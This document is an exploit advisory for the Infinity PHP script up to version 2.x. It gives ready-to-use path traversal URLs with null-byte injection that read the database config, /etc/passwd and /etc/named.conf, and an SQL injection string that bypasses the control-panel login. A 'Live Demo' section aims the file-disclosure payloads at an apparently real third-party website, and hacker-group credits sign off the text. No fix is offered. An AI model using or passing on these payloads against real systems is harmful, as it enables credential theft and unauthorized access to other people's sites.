Infinity <= 2.x.x options[style_dir] Local File Disclosure Vulnerability
2009-08-18 20:38:17------------------Infinity <= v2.X.X Local File Disclosure / Auth Bypass Vulnerabilities-------------------------
# #### # ### ## ### #### #### ### ## ### #### #### ### # ### #### ######
## # # ## # # # # # # # # # # # # # # # # # # # ## # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # #
# # ### # # ### # # ## ### ### # # # # ### ## # # # ### #
#### # # #### # # ###### # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # ## # # # # # # # ## # #
## ## ### ## ## #### ### ### #### ### # # ### #### #### ### # ### # #### ###
#----------------------------------------------------------------------------------------------------------------
Script : Infinity
version : 2.X.X
Language: PHP
Site: http://www.dimofinf.net/
Author: SwEET-DeViL
need magic_quotes_gpc = Off <-----(<>
----------------------------------------------------------------------------------------------------------------
- +[LFD]
#Exploit:
http://WWW.Site.Com/inf/?options[style_dir]=../include/db.php%00
http://WWW.Site.Com/inf/?options[style_dir]=../../../../../../etc/passwd%00
#
###
#
#----------------------------------------------------------------------------------------------------------------
- +[AB]
http://WWW.Site.Com/inf/cp
#Exploit:
username : 'or 1=1/*
password : SwEET-DeViL
#----------------------------------------------------------------------------------------------------------------
#
###
#
- - +[Live Demo] : >
http://www.alihammadi.com/html/?options[style_dir]=../include/db.php%00
http://www.alihammadi.com/html/?options[style_dir]=../../../../../../etc/named.conf%00
/-------------www.arab4services.net-----------------\
|+------------------------------------------------+ |
|| SwEET-DeViL & viP HaCkEr | |
|| gamr-14(at)hotmail.com | |
|+------------------------------------------------+ |
\---------------------------------------------------/
#
Fixes
No fixesIn order to submit a new fix you need to be registered.